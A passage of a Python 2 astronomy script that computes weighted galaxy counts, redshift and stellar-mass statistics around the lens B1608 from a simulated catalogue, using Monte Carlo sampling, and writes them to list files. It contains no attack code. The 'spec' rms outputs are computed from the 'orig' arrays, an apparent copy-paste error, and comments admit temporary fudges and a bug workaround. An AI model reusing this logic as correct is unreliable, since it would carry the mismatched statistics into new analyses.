np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_sim_gal = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_sim_oneoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_sim_zweight = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_sim_mass = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_sim_mass2 = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_sim_mass3 = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_sim_zoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_sim_massoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_sim_mass2overr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_sim_mass3overr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_sim_zmassoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_sim_zmass2overr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_tab_sim_gal = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_tab_sim_oneoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_tab_sim_zweight = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_tab_sim_mass = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_tab_sim_mass2 = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_tab_sim_mass3 = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_tab_sim_zoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_tab_sim_massoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_tab_sim_mass2overr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_tab_sim_mass3overr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_tab_sim_zmassoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_tab_sim_zmass2overr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\n\nwith open(sys.argv[1]) as file: #B1608_sims#.lst\n for gal in file:\n i=i+1\n if i in [1000, 5000, 10000, 20000, 30000, 40000, 50000, 60000, 70000, 80000, 90000, 100000, 110000, 120000, 130000, 140000, 150000, 160000, 170000, 180000, 190000, 200000]:\n print i, \"objects...\"\n if (gal!=\"\\n\"):\n ID=str(gal.split()[0])\n posx = float(gal.split()[4])\n posy = float(gal.split()[5])\n MAG_i = float(gal.split()[12])\n catmass = np.log10(float(gal.split()[1]))\n catz = float(gal.split()[2])\n Z_B = float(gal.split()[3])\n Z_B_MIN = Z_B - 0.13 # TEMPORARY solution until i include this value in the _pdz catalogue\n Z_B_MAX = Z_B + 0.13\n Mstar_best_catz = float(gal.split()[93])\n Mstar_inf_catz = float(gal.split()[94])\n Mstar_med_catz = float(gal.split()[95])\n Mstar_sup_catz = float(gal.split()[96])\n Mstar_best_zb = float(gal.split()[97])\n Mstar_inf_zb = float(gal.split()[98])\n Mstar_med_zb = float(gal.split()[99])\n Mstar_sup_zb = float(gal.split()[100])\n x=int((posx/deginrad-minx)*cells_on_a_side[0])\n y=int((posy/deginrad-miny)*cells_on_a_side[1])\n #print x,y #posx/deginrad/cells_on_a_side[0],posy/deginrad/cells_on_a_side[1],minx,miny\n #print ID,posx,posy,MAG_i,catmass,catz,Z_B,Z_B_MIN,Z_B_MAX,Mstar_best_catz,Mstar_inf_catz,Mstar_med_catz, Mstar_sup_catz, Mstar_best_zb, Mstar_inf_zb,Mstar_med_zb,Mstar_sup_zb\n sep=np.sqrt((centersx[x][y]-posx)**2 + (centersy[x][y]-posy)**2)*1/deginrad*3600 # in arcsec\n if (MAG_i <= int(str(sys.argv[4]))) and (sep >= 4) and (sep <= int(str(sys.argv[3]))):\n\n #spec\n if catz <= z_s_B1608:\n B1608_specsim_gal[x][y] = B1608_specsim_gal[x][y] + 1\n B1608_specsim_zweight[x][y] = B1608_specsim_zweight[x][y] + (z_s_B1608 * catz) - (catz * catz)\n B1608_specsim_mass[x][y] = B1608_specsim_mass[x][y] + 10**Mstar_med_catz\n B1608_specsim_mass2[x][y] = B1608_specsim_mass2[x][y] + ((10**Mstar_med_catz) * (10**Mstar_med_catz))\n B1608_specsim_mass3[x][y] = B1608_specsim_mass3[x][y] + ((10**Mstar_med_catz) * (10**Mstar_med_catz) * (10**Mstar_med_catz))\n if (sep <= 10):\n B1608_specsim_oneoverr[x][y] = B1608_specsim_oneoverr[x][y] + 0.1\n B1608_specsim_zoverr[x][y] = B1608_specsim_zoverr[x][y] + (((z_s_B1608 * catz) - (catz * catz)) / 10)\n B1608_specsim_massoverr[x][y] = B1608_specsim_massoverr[x][y] + ((10**Mstar_med_catz) / 10)\n B1608_specsim_mass2overr[x][y] = B1608_specsim_mass2overr[x][y] + (((10**Mstar_med_catz) * (10**Mstar_med_catz)) / 10)\n B1608_specsim_mass3overr[x][y] = B1608_specsim_mass3overr[x][y] + (((10**Mstar_med_catz) * (10**Mstar_med_catz) * (10**Mstar_med_catz)) / 10)\n B1608_specsim_zmassoverr[x][y] = B1608_specsim_zmassoverr[x][y] + (((z_s_B1608 * catz) - (catz * catz)) * (10**Mstar_med_catz) / 10)\n B1608_specsim_zmass2overr[x][y] = B1608_specsim_zmass2overr[x][y] + (((z_s_B1608 * catz) - (catz * catz)) * (10**Mstar_med_catz) * (10**Mstar_med_catz) / 10)\n else:\n B1608_specsim_oneoverr[x][y] = B1608_specsim_oneoverr[x][y] + 1. / sep\n B1608_specsim_zoverr[x][y] = B1608_specsim_zoverr[x][y] + (((z_s_B1608 * catz) - (catz * catz)) / sep)\n B1608_specsim_massoverr[x][y] = B1608_specsim_massoverr[x][y] + ((10**Mstar_med_catz) / sep)\n B1608_specsim_mass2overr[x][y] = B1608_specsim_mass2overr[x][y] + (((10**Mstar_med_catz) * (10**Mstar_med_catz)) / sep)\n B1608_specsim_mass3overr[x][y] = B1608_specsim_mass3overr[x][y] + (((10**Mstar_med_catz) * (10**Mstar_med_catz) * (10**Mstar_med_catz)) / sep)\n B1608_specsim_zmassoverr[x][y] = B1608_specsim_zmassoverr[x][y] + (((z_s_B1608 * catz) - (catz * catz)) * (10**Mstar_med_catz) / sep)\n B1608_specsim_zmass2overr[x][y] = B1608_specsim_zmass2overr[x][y] + (((z_s_B1608 * catz) - (catz * catz)) * (10**Mstar_med_catz) * (10**Mstar_med_catz) / sep)\n\n #orig:\n where = 100 + int(np.max([Z_B/0.05, 1])) * 4 #the column in the catalogue\n if Mstar_med_zb < 0:\n if float(gal.split()[where-1])>0: #mass_med\n Mstar_med_zb=float(gal.split()[where-1])\n elif float(gal.split()[where-3])>0: #mass_best\n Mstar_med_zb=float(gal.split()[where-3])\n else:\n pos=int(np.max([Z_B/0.05, 1]))\n while (pos<68) and (float(gal.split()[100 + pos * 4 - 3])<=0):\n pos=pos+1\n Mstar_med_zb=float(gal.split()[100 + pos * 4 - 3])\n if Mstar_med_zb<=0:\n pos=int(np.max([Z_B/0.05, 1]))\n while (pos>1) and (float(gal.split()[100 + pos * 4 - 3])<=0):\n pos=pos-1\n Mstar_med_zb=float(gal.split()[100 + pos * 4 - 3])\n #print Mstar_med_zb\n if Mstar_med_zb<=0:\n Mstar_med_zb=9\n if (Mstar_inf_zb < 0) or (Mstar_sup_zb < 0):\n Mstar_inf_zb=Mstar_med_zb-0.1\n Mstar_sup_zb=Mstar_med_zb+0.1\n if Z_B <= z_s_B1608:\n B1608_origsim_gal[x][y] = B1608_origsim_gal[x][y] + 1\n B1608_origsim_zweight[x][y] = B1608_origsim_zweight[x][y] + (z_s_B1608 * Z_B) - (Z_B * Z_B)\n B1608_origsim_mass[x][y] = B1608_origsim_mass[x][y] + 10**Mstar_med_zb\n B1608_origsim_mass2[x][y] = B1608_origsim_mass2[x][y] + ((10**Mstar_med_zb) * (10**Mstar_med_zb))\n B1608_origsim_mass3[x][y] = B1608_origsim_mass3[x][y] + ((10**Mstar_med_zb) * (10**Mstar_med_zb) * (10**Mstar_med_zb))\n if (sep <= 10):\n B1608_origsim_oneoverr[x][y] = B1608_origsim_oneoverr[x][y] + 0.1\n B1608_origsim_zoverr[x][y] = B1608_origsim_zoverr[x][y] + (((z_s_B1608 * Z_B) - (Z_B * Z_B)) / 10)\n B1608_origsim_massoverr[x][y] = B1608_origsim_massoverr[x][y] + ((10**Mstar_med_zb) / 10)\n B1608_origsim_mass2overr[x][y] = B1608_origsim_mass2overr[x][y] + (((10**Mstar_med_zb) * (10**Mstar_med_zb)) / 10)\n B1608_origsim_mass3overr[x][y] = B1608_origsim_mass3overr[x][y] + (((10**Mstar_med_zb) * (10**Mstar_med_zb) * (10**Mstar_med_zb)) / 10)\n B1608_origsim_zmassoverr[x][y] = B1608_origsim_zmassoverr[x][y] + (((z_s_B1608 * Z_B) - (Z_B * Z_B)) * (10**Mstar_med_zb) / 10)\n B1608_origsim_zmass2overr[x][y] = B1608_origsim_zmass2overr[x][y] + (((z_s_B1608 * Z_B) - (Z_B * Z_B)) * (10**Mstar_med_zb) * (10**Mstar_med_zb) / 10)\n else:\n B1608_origsim_oneoverr[x][y] = B1608_origsim_oneoverr[x][y] + 1. / sep\n B1608_origsim_zoverr[x][y] = B1608_origsim_zoverr[x][y] + (((z_s_B1608 * Z_B) - (Z_B * Z_B)) / sep)\n B1608_origsim_massoverr[x][y] = B1608_origsim_massoverr[x][y] + ((10**Mstar_med_zb) / sep)\n B1608_origsim_mass2overr[x][y] = B1608_origsim_mass2overr[x][y] + (((10**Mstar_med_zb) * (10**Mstar_med_zb)) / sep)\n B1608_origsim_mass3overr[x][y] = B1608_origsim_mass3overr[x][y] + (((10**Mstar_med_zb) * (10**Mstar_med_zb) * (10**Mstar_med_zb)) / sep)\n B1608_origsim_zmassoverr[x][y] = B1608_origsim_zmassoverr[x][y] + (((z_s_B1608 * Z_B) - (Z_B * Z_B)) * (10**Mstar_med_zb) / sep)\n B1608_origsim_zmass2overr[x][y] = B1608_origsim_zmass2overr[x][y] + (((z_s_B1608 * Z_B) - (Z_B * Z_B)) * (10**Mstar_med_zb) * (10**Mstar_med_zb) / sep)\n\n\n\n\n\n\n\n \n samplesup=np.zeros(int(str(sys.argv[2])))\n sampleinf=np.zeros(int(str(sys.argv[2])))\n fracz=1-1.0*(Z_B_MAX-Z_B)/(Z_B_MAX-Z_B_MIN)\n fracmass=1-(1.0*(10**Mstar_sup_zb-10**Mstar_med_zb)/(10**Mstar_sup_zb-10**Mstar_inf_zb))\n\n #if str(sys.argv[8]) == \"samp\":\n if (fracz > 0) and (fracz < 1):\n samplesup=Z_B+abs(np.random.normal(0, Z_B_MAX-Z_B, int(str(sys.argv[2]))))\n sampleinf=Z_B-abs(np.random.normal(0, Z_B-Z_B_MIN, int(str(sys.argv[2]))))\n # no negative redshifts\n while len(sampleinf[sampleinf<0]) > 0:\n sampleinf[sampleinf<0]=Z_B-abs(np.random.normal(0, Z_B-Z_B_MIN, len(sampleinf[sampleinf<0])))\n rand=np.random.random(int(str(sys.argv[2])))\n samplez=sampleinf\n samplez[np.where(rand>fracz)]=samplesup[np.where(rand>fracz)]\n #samplez[samplez<0]=0\n if (fracz <= 0) or (fracz >= 1):\n samplez=np.random.normal(Z_B_MIN+(Z_B_MAX-Z_B_MIN)/2, (Z_B_MAX-Z_B_MIN)/2, int(str(sys.argv[2])))\n #samplez[samplez<0]=0\n # for mass, assume gaussian distribution in log, not normal space, so I don't get things like negative mass\n if (fracmass > 0) and (fracmass < 1):\n samplesup=10**(Mstar_med_zb+abs(np.random.normal(0, Mstar_sup_zb-Mstar_med_zb, int(str(sys.argv[2])))))\n sampleinf=10**(Mstar_med_zb-abs(np.random.normal(0, Mstar_med_zb-Mstar_inf_zb, int(str(sys.argv[2])))))\n rand=np.random.random(int(str(sys.argv[2])))\n samplemass=sampleinf\n samplemass[np.where(rand>fracmass)]=samplesup[np.where(rand>fracmass)]\n if (fracmass <= 0) or (fracmass >= 1):\n samplemass=10**np.random.normal(Mstar_inf_zb+(Mstar_sup_zb-Mstar_inf_zb)/2, (Mstar_sup_zb-Mstar_inf_zb)/2, int(str(sys.argv[2])))\n #print \"samplemass\"\n #print samplemass\n #ignore objects with z>z_source for all weights when drawing from the z PDF\n B1608_sim_gal[x][y][samplez<z_s_B1608] = B1608_sim_gal[x][y][samplez<z_s_B1608] + 1\n B1608_sim_zweight[x][y][samplez<z_s_B1608] = B1608_sim_zweight[x][y][samplez<z_s_B1608] + (z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)\n B1608_sim_mass[x][y][samplez<z_s_B1608] = B1608_sim_mass[x][y][samplez<z_s_B1608] + samplemass[samplez<z_s_B1608]\n B1608_sim_mass2[x][y][samplez<z_s_B1608] = B1608_sim_mass2[x][y][samplez<z_s_B1608] + samplemass[samplez<z_s_B1608]**2\n B1608_sim_mass3[x][y][samplez<z_s_B1608] = B1608_sim_mass3[x][y][samplez<z_s_B1608] + samplemass[samplez<z_s_B1608]**3\n #print (catsim['Z_B_MAX'][i] - catsim['Z_B_MIN'][i])/2\n if (sep <= 10):\n B1608_sim_oneoverr[x][y][samplez<z_s_B1608] = B1608_sim_oneoverr[x][y][samplez<z_s_B1608] + 0.1\n B1608_sim_zoverr[x][y][samplez<z_s_B1608] = B1608_sim_zoverr[x][y][samplez<z_s_B1608] + (((z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)) / 10)\n B1608_sim_massoverr[x][y][samplez<z_s_B1608] = B1608_sim_massoverr[x][y][samplez<z_s_B1608] + (samplemass[samplez<z_s_B1608] / 10)\n B1608_sim_mass2overr[x][y][samplez<z_s_B1608] = B1608_sim_mass2overr[x][y][samplez<z_s_B1608] + ((samplemass[samplez<z_s_B1608]**2) / 10)\n B1608_sim_mass3overr[x][y][samplez<z_s_B1608] = B1608_sim_mass3overr[x][y][samplez<z_s_B1608] + ((samplemass[samplez<z_s_B1608]**3) / 10)\n B1608_sim_zmassoverr[x][y][samplez<z_s_B1608] = B1608_sim_zmassoverr[x][y][samplez<z_s_B1608] + (((z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)) * samplemass[samplez<z_s_B1608] / 10)\n B1608_sim_zmass2overr[x][y][samplez<z_s_B1608] = B1608_sim_zmass2overr[x][y][samplez<z_s_B1608] + (((z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)) * (samplemass[samplez<z_s_B1608]**2) / 10)\n else:\n B1608_sim_oneoverr[x][y][samplez<z_s_B1608] = B1608_sim_oneoverr[x][y][samplez<z_s_B1608] + 1/sep\n B1608_sim_zoverr[x][y][samplez<z_s_B1608] = B1608_sim_zoverr[x][y][samplez<z_s_B1608] + (((z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)) / sep)\n B1608_sim_massoverr[x][y][samplez<z_s_B1608] = B1608_sim_massoverr[x][y][samplez<z_s_B1608] + (samplemass[samplez<z_s_B1608] / sep)\n B1608_sim_mass2overr[x][y][samplez<z_s_B1608] = B1608_sim_mass2overr[x][y][samplez<z_s_B1608] + ((samplemass[samplez<z_s_B1608]**2) / sep)\n B1608_sim_mass3overr[x][y][samplez<z_s_B1608] = B1608_sim_mass3overr[x][y][samplez<z_s_B1608] + ((samplemass[samplez<z_s_B1608]**3) / sep)\n B1608_sim_zmassoverr[x][y][samplez<z_s_B1608] = B1608_sim_zmassoverr[x][y][samplez<z_s_B1608] + (((z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)) * samplemass[samplez<z_s_B1608] / sep)\n B1608_sim_zmass2overr[x][y][samplez<z_s_B1608] = B1608_sim_zmass2overr[x][y][samplez<z_s_B1608] + (((z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)) * (samplemass[samplez<z_s_B1608]**2) / sep)\n \n #if str(sys.argv[8]) == \"tab\":\n massbest_tab=np.zeros(70)\n massinf_tab=np.zeros(70)\n massmed_tab=np.zeros(70)\n masssup_tab=np.zeros(70)\n pdz_tab=np.zeros(70)\n for m in range(70):\n pdz_tab[m]=float(gal.split()[22+m])\n if pdz_tab[m]<0.001:\n pdz_tab[m]=0\n if len(pdz_tab[pdz_tab!=0])!=0:\n for m in range(70):\n if pdz_tab[m]!=0:\n massbest_tab[m]=float(gal.split()[100 + (m+1) * 4 - 3])\n #print massbest_tab[m]\n if massbest_tab[m]<0:\n massbest_tab[m]=9 # very small number of exceptions\n for m in range(70):\n if pdz_tab[m]!=0:\n massmed_tab[m]=float(gal.split()[100 + (m+1) * 4 - 1])\n if massmed_tab[m]<0:\n massmed_tab[m]=massbest_tab[m]\n massinf_tab[m]=float(gal.split()[100 + (m+1) * 4 - 2])\n masssup_tab[m]=float(gal.split()[100 + (m+1) * 4])\n if massinf_tab[m]<0:\n massinf_tab[m]=massmed_tab[m]-0.1\n if masssup_tab[m]<0:\n masssup_tab[m]=massmed_tab[m]+0.1\n #print ID,m,massbest_tab[m],massinf_tab[m],masssup_tab[m],masssup_tab[m]\n custm = stats.rv_discrete(name='custm', values=(zgridint, pdz_tab))\n sample=custm.rvs(size=int(str(sys.argv[2])))\n iter=0\n while len(sample[pdz_tab[sample]==0]) != 0: # happens because the probabilities do not sum exactly to 1; first reshuffle 10 times; if this does not solve the problem replace with the value having maximum probability; happens because the probabilities do not sum exactly to 1\n iter=iter+1\n sample=custm.rvs(size=int(str(sys.argv[2])))\n if iter==10:\n #print pdz_tab,ID,sample,str(sys.argv[1])\n sample[pdz_tab[sample]==0]=np.where(pdz_tab==np.max(pdz_tab[sample[pdz_tab[sample]!=0]]))[0][0]\n samplez=zgrid[sample]\n sample_massinf_tab=massinf_tab[sample] # since \"sample\" is constant, this insures that Mstar corresponds to z\n sample_massmed_tab=massmed_tab[sample]\n #print sample_massmed_tab\n sample_masssup_tab=masssup_tab[sample]\n sample_lenssup=np.zeros(int(str(sys.argv[2])))\n sample_lensinf=np.zeros(int(str(sys.argv[2])))\n #print sample_masssup_tab, sample_massmed_tab, samplez, catfield['ID'][0]\n iter=0\n for l in range(int(str(sys.argv[2]))):\n if sample_massmed_tab[l]==0: #I SHOULD NOT HAVE TO DO THIS, THERE IS A BUG; actually I tested and this happens because of missing stellar mass for z=3.5 (the edge)\n sample_massmed_tab[l]=9\n sample_massinf_tab[l]=8.9\n sample_masssup_tab[l]=9.1\n if iter==0:\n print \"Exception!\", ID\n iter=iter+1\n sample_lenssup[l]=10**(sample_massmed_tab[l]+abs(np.random.normal(0, sample_masssup_tab[l]-sample_massmed_tab[l], 1)))\n sample_lensinf[l]=10**(sample_massmed_tab[l]-abs(np.random.normal(0, sample_massmed_tab[l]-sample_massinf_tab[l], 1)))\n rand=np.random.random(1)\n samplemass[l]=sample_lensinf[l]\n fracmass=1-(1.0*(10**sample_masssup_tab[l]-10**sample_massmed_tab[l])/(10**sample_masssup_tab[l]-10**sample_massinf_tab[l]))\n if rand>fracmass:\n samplemass[l]=sample_lenssup[l]\n #print zgrid[sample]\n #print massinf_tab[sample]\n #print massmed_tab[sample]\n #print masssup_tab[sample]\n #print samplemass\n #ignore objects with z>z_source for all weights when drawing from the z PDF\n B1608_tab_sim_gal[x][y][samplez<z_s_B1608] = B1608_tab_sim_gal[x][y][samplez<z_s_B1608] + 1\n B1608_tab_sim_zweight[x][y][samplez<z_s_B1608] = B1608_tab_sim_zweight[x][y][samplez<z_s_B1608] + (z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)\n B1608_tab_sim_mass[x][y][samplez<z_s_B1608] = B1608_tab_sim_mass[x][y][samplez<z_s_B1608] + samplemass[samplez<z_s_B1608]\n B1608_tab_sim_mass2[x][y][samplez<z_s_B1608] = B1608_tab_sim_mass2[x][y][samplez<z_s_B1608] + samplemass[samplez<z_s_B1608]**2\n B1608_tab_sim_mass3[x][y][samplez<z_s_B1608] = B1608_tab_sim_mass3[x][y][samplez<z_s_B1608] + samplemass[samplez<z_s_B1608]**3\n #print (catfield['Z_B_MAX'][i] - catfield['Z_B_MIN'][i])/2\n if (sep <= 10):\n B1608_tab_sim_oneoverr[x][y][samplez<z_s_B1608] = B1608_tab_sim_oneoverr[x][y][samplez<z_s_B1608] + 0.1\n B1608_tab_sim_zoverr[x][y][samplez<z_s_B1608] = B1608_tab_sim_zoverr[x][y][samplez<z_s_B1608] + (((z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)) / 10)\n B1608_tab_sim_massoverr[x][y][samplez<z_s_B1608] = B1608_tab_sim_massoverr[x][y][samplez<z_s_B1608] + (samplemass[samplez<z_s_B1608] / 10)\n B1608_tab_sim_mass2overr[x][y][samplez<z_s_B1608] = B1608_tab_sim_mass2overr[x][y][samplez<z_s_B1608] + ((samplemass[samplez<z_s_B1608]**2) / 10)\n B1608_tab_sim_mass3overr[x][y][samplez<z_s_B1608] = B1608_tab_sim_mass3overr[x][y][samplez<z_s_B1608] + ((samplemass[samplez<z_s_B1608]**3) / 10)\n B1608_tab_sim_zmassoverr[x][y][samplez<z_s_B1608] = B1608_tab_sim_zmassoverr[x][y][samplez<z_s_B1608] + (((z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)) * samplemass[samplez<z_s_B1608] / 10)\n B1608_tab_sim_zmass2overr[x][y][samplez<z_s_B1608] = B1608_tab_sim_zmass2overr[x][y][samplez<z_s_B1608] + (((z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)) * (samplemass[samplez<z_s_B1608]**2) / 10)\n else:\n B1608_tab_sim_oneoverr[x][y][samplez<z_s_B1608] = B1608_tab_sim_oneoverr[x][y][samplez<z_s_B1608] + 1/sep\n B1608_tab_sim_zoverr[x][y][samplez<z_s_B1608] = B1608_tab_sim_zoverr[x][y][samplez<z_s_B1608] + (((z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)) / sep)\n B1608_tab_sim_massoverr[x][y][samplez<z_s_B1608] = B1608_tab_sim_massoverr[x][y][samplez<z_s_B1608] + (samplemass[samplez<z_s_B1608] / sep)\n B1608_tab_sim_mass2overr[x][y][samplez<z_s_B1608] = B1608_tab_sim_mass2overr[x][y][samplez<z_s_B1608] + ((samplemass[samplez<z_s_B1608]**2) / sep)\n B1608_tab_sim_mass3overr[x][y][samplez<z_s_B1608] = B1608_tab_sim_mass3overr[x][y][samplez<z_s_B1608] + ((samplemass[samplez<z_s_B1608]**3) / sep)\n B1608_tab_sim_zmassoverr[x][y][samplez<z_s_B1608] = B1608_tab_sim_zmassoverr[x][y][samplez<z_s_B1608] + (((z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)) * samplemass[samplez<z_s_B1608] / sep)\n B1608_tab_sim_zmass2overr[x][y][samplez<z_s_B1608] = B1608_tab_sim_zmass2overr[x][y][samplez<z_s_B1608] + (((z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)) * (samplemass[samplez<z_s_B1608]**2) / sep)\n\nB1608_specsim_mass2rms = np.sqrt(B1608_origsim_mass2)\nB1608_specsim_mass3rms = scipy.special.cbrt(B1608_origsim_mass3)\nB1608_specsim_mass2overrrms = np.sqrt(B1608_origsim_mass2overr)\nB1608_specsim_mass3overrrms = scipy.special.cbrt(B1608_origsim_mass3overr)\n#if str(sys.argv[8]) == \"orig\":\nB1608_origsim_mass2rms = np.sqrt(B1608_origsim_mass2)\nB1608_origsim_mass3rms = scipy.special.cbrt(B1608_origsim_mass3)\nB1608_origsim_mass2overrrms = np.sqrt(B1608_origsim_mass2overr)\nB1608_origsim_mass3overrrms = scipy.special.cbrt(B1608_origsim_mass3overr)\n#if str(sys.argv[8]) == \"samp\":\nB1608_sim_mass2rms = np.sqrt(B1608_sim_mass2)\nB1608_sim_mass3rms = scipy.special.cbrt(B1608_sim_mass3)\nB1608_sim_mass2overrrms = np.sqrt(B1608_sim_mass2overr)\nB1608_sim_mass3overrrms = scipy.special.cbrt(B1608_sim_mass3overr)\n#if str(sys.argv[8]) == \"tab\":\nB1608_tab_sim_mass2rms = np.sqrt(B1608_tab_sim_mass2)\nB1608_tab_sim_mass3rms = scipy.special.cbrt(B1608_tab_sim_mass3)\nB1608_tab_sim_mass2overrrms = np.sqrt(B1608_tab_sim_mass2overr)\nB1608_tab_sim_mass3overrrms = scipy.special.cbrt(B1608_tab_sim_mass3overr)\n\ns = open('%s_B1608_spec_size%s_i%s.lst' % (str(sys.argv[1])[0:len(str(sys.argv[1]))-4],str(sys.argv[3]),str(sys.argv[4])),'w')\nf = open('%s_B1608_orig_size%s_i%s.lst' % (str(sys.argv[1])[0:len(str(sys.argv[1]))-4],str(sys.argv[3]),str(sys.argv[4])),'w')\n#if str(sys.argv[8]) == \"samp\":\ng = open('%s_B1608_samp_size%s_i%s.lst' % (str(sys.argv[1])[0:len(str(sys.argv[1]))-4],str(sys.argv[3]),str(sys.argv[4])),'w')\n#if str(sys.argv[8]) == \"tab\":\nh = open('%s_B1608_tab_size%s_i%s.lst' % (str(sys.argv[1])[0:len(str(sys.argv[1]))-4],str(sys.argv[3]),str(sys.argv[4])),'w')\nfor i in range(cells_on_a_side[0]):\n for j in range(cells_on_a_side[1]):\n s.write('name= %s coords= %s %s w_gal= %.4e w_oneoverr= %.4e w_zweight= %.4e w_mass= %.4e w_mass2= %.4e w_mass2rms= %.4e w_mass3= %.4e w_mass3rms= %.4e w_zoverr= %.4e w_massoverr= %.4e w_mass2overr= %.4e w_mass3overr= %.4e w_mass2overrrms= %.4e w_mass3overrrms= %.4e w_zmassoverr= %.4e w_zmass2overr= %.4e \\n' % (str(sys.argv[1])[0:len(str(sys.argv[1]))-4], centersx[i][j], centersy[i][j], B1608_specsim_gal[i][j], B1608_specsim_oneoverr[i][j], B1608_specsim_zweight[i][j], B1608_specsim_mass[i][j], B1608_specsim_mass2[i][j], B1608_specsim_mass2rms[i][j], B1608_specsim_mass3[i][j], B1608_specsim_mass3rms[i][j], B1608_specsim_zoverr[i][j], B1608_specsim_massoverr[i][j], B1608_specsim_mass2overr[i][j], B1608_specsim_mass3overr[i][j], B1608_specsim_mass2overrrms[i][j], B1608_specsim_mass3overrrms[i][j], B1608_specsim_zmassoverr[i][j], B1608_specsim_zmass2overr[i][j]))\n f.write('name= %s coords= %s %s w_gal= %.4e w_oneoverr= %.4e w_zweight= %.4e w_mass= %.4e w_mass2= %.4e w_mass2rms= %.4e w_mass3= %.4e w_mass3rms= %.4e w_zoverr= %.4e w_massoverr= %.4e w_mass2overr= %.4e w_mass3overr= %.4e w_mass2overrrms= %.4e w_mass3overrrms= %.4e w_zmassoverr= %.4e w_zmass2overr= %.4e \\n' % (str(sys.argv[1])[0:len(str(sys.argv[1]))-4], centersx[i][j], centersy[i][j], B1608_origsim_gal[i][j], B1608_origsim_oneoverr[i][j], B1608_origsim_zweight[i][j], B1608_origsim_mass[i][j], B1608_origsim_mass2[i][j], B1608_origsim_mass2rms[i][j], B1608_origsim_mass3[i][j], B1608_origsim_mass3rms[i][j], B1608_origsim_zoverr[i][j], B1608_origsim_massoverr[i][j], B1608_origsim_mass2overr[i][j], B1608_origsim_mass3overr[i][j], B1608_origsim_mass2overrrms[i][j], B1608_origsim_mass3overrrms[i][j], B1608_origsim_zmassoverr[i][j], B1608_origsim_zmass2overr[i][j]))\n for k in range(int(str(sys.argv[2]))):\n g.write('name= %s coords= %s %s w_gal= %.4e w_oneoverr= %.4e w_zweight= %.4e w_mass= %.4e w_mass2= %.4e w_mass2rms= %.4e w_mass3= %.4e w_mass3rms= %.4e w_zoverr= %.4e w_massoverr= %.4e w_mass2overr= %.4e w_mass3overr= %.4e w_mass2overrrms= %.4e w_mass3overrrms= %.4e w_zmassoverr= %.4e w_zmass2overr= %.4e \\n' % (str(sys.argv[1])[0:len(str(sys.argv[1]))-4], centersx[i][j], centersy[i][j], B1608_sim_gal[i][j][k], B1608_sim_oneoverr[i][j][k], B1608_sim_zweight[i][j][k], B1608_sim_mass[i][j][k], B1608_sim_mass2[i][j][k], B1608_sim_mass2rms[i][j][k], B1608_sim_mass3[i][j][k], B1608_sim_mass3rms[i][j][k], B1608_sim_zoverr[i][j][k], B1608_sim_massoverr[i][j][k], B1608_sim_mass2overr[i][j][k], B1608_sim_mass3overr[i][j][k], B1608_sim_mass2overrrms[i][j][k], B1608_sim_mass3overrrms[i][j][k], B1608_sim_zmassoverr[i][j][k], B1608_sim_zmass2overr[i][j][k]))\n for k in range(int(str(sys.argv[2]))):\n h.write('name= %s coords= %s %s w_gal= %.4e w_oneoverr= %.4e w_zweight= %.4e w_mass= %.4e w_mass2= %.4e w_mass2rms= %.4e w_mass3= %.4e w_mass3rms= %.4e w_zoverr= %.4e 